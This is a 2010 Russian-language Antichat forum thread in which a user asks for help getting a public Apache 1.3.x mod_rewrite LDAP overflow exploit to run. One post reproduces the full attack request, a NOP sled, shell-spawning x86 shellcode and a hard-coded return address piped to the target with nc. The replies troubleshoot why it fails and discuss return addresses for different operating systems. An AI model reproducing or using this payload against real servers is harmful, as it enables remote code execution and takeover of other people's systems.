ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Apche <1.3.37 exploit
  #1  
Старый 02.04.2010, 15:35
Аватар для invis87
invis87
Новичок
Регистрация: 09.04.2008
Сообщений: 5
Провел на форуме:
17783

Репутация: 1
По умолчанию Apche <1.3.37 exploit

Помогите разобраться с эксплойтом - http://milw0rm.com/exploits/2237
Пытаюсь его запустить но сервер в ответ пишет
HTTP/1.1 400 Bad Request

Я так понимаю в этой строке:
Код:
echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\
закралась лишняя кавычка, но вот какая именно не уловлю.
 
Ответить с цитированием

  #2  
Старый 02.04.2010, 15:57
Аватар для wkar
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

попробуй убрать кавычку возле гет
 
Ответить с цитированием

  #3  
Старый 02.04.2010, 16:07
Аватар для invis87
invis87
Новичок
Регистрация: 09.04.2008
Сообщений: 5
Провел на форуме:
17783

Репутация: 1
По умолчанию

Не помогло.
Код:
echo -ne my_string_for_print
работает так же как и
Код:
echo -ne "my_string_for_print"
 
Ответить с цитированием

  #4  
Старый 02.04.2010, 17:16
Аватар для invis87
invis87
Новичок
Регистрация: 09.04.2008
Сообщений: 5
Провел на форуме:
17783

Репутация: 1
По умолчанию

Код:
echo -ne "GET /kung/ldap://localhost/%90%90%90%90%90%90%90%90%90%90%90\
%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90\
%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90\
%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90\
%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90\
%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%89%e6\
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
Host: $host\r\n\r\n" | nc $host 80
Такая штука тоже не работает. Даже с удалёнными CCCCCCCCCC....
пробовал так:

Код:
nc <host> <port>
<тут мессага хосту>
Если в месседже после GET <uri> есть пробел, то сразу выбрасывается <TITLE>400 Bad Request</TITLE>
Как же тогда выполнить экспойт с его
Код:
HTTP/1.1\r\n\ Host: $host\r\n\r\n
Что вообще ЭТО делает
 
Ответить с цитированием

  #5  
Старый 04.04.2010, 19:23
Аватар для overxor
overxor
Новичок
Регистрация: 11.09.2009
Сообщений: 23
Провел на форуме:
64270

Репутация: 23
Отправить сообщение для overxor с помощью ICQ
По умолчанию

Цитата:
HTTP/1.1\r\n\ Host: $host\r\n\r\n
Что вообще ЭТО делает
Это сетевая этика. Чтобы клиент и сервер понимали друг друга и не было путаницы, было введено использовать возврат каретки и переход на новую строку.

ldap обработчик в апаче по дефолту, вроде, отключен, поэтому не вызывается уязвимая функция.

Если бы даже он был включен, вероятность выполнения это эксплойта была бы ничтожна мала, т.к. адрес возврата задан для определенной ОС(в данном случае debian). Так что, тебе придется сначала найти эту уязвимость, проэксплуатировать, написать версии для разных ОС и только потом уже использовать =) enjoy
 
Ответить с цитированием

  #6  
Старый 05.04.2010, 17:18
Аватар для invis87
invis87
Новичок
Регистрация: 09.04.2008
Сообщений: 5
Провел на форуме:
17783

Репутация: 1
По умолчанию

спасибо
 
Ответить с цитированием

  #7  
Старый 07.06.2010, 15:59
Аватар для Migel
Migel
Новичок
Регистрация: 06.06.2010
Сообщений: 23
Провел на форуме:
21402

Репутация: 5
По умолчанию

Цитата:
Если бы даже он был включен, вероятность выполнения это эксплойта была бы ничтожна мала, т.к. адрес возврата задан для определенной ОС(в данном случае debian).
Я не понимаю при чем здесь ОС? Разьве Apache для разных линухов отличаются?
 
Ответить с цитированием

  #8  
Старый 07.06.2010, 17:23
Аватар для overxor
overxor
Новичок
Регистрация: 11.09.2009
Сообщений: 23
Провел на форуме:
64270

Репутация: 23
Отправить сообщение для overxor с помощью ICQ
По умолчанию

Apache - нет,а адрес возварата везде разный
 
Ответить с цитированием

  #9  
Старый 07.06.2010, 17:39
Аватар для Migel
Migel
Новичок
Регистрация: 06.06.2010
Сообщений: 23
Провел на форуме:
21402

Репутация: 5
По умолчанию

Цитата:
адрес возварата везде разный
Я не силен в программировании, но зачем нужен адрес возврата для DoS експлойта? Записать в память кашу можно и не зная его...
 
Ответить с цитированием

  #10  
Старый 07.06.2010, 17:47
Аватар для Migel
Migel
Новичок
Регистрация: 06.06.2010
Сообщений: 23
Провел на форуме:
21402

Репутация: 5
По умолчанию

И еще - разве такие вещи не зависят от ядра? Т.е. ясное дело, что такой сплойт не подойдет к соляре, но разьве он не будет работать скажем на ВСЕХ линухах с одинаковым ядром?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Mozilla Firefox 3.5.3 Local Download Manager Exploit Isis Уязвимости 0 31.10.2009 04:00
exploit phpBB 2.0.19 ( by SpiderZ ) liauliau Форумы 21 13.01.2007 23:01



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ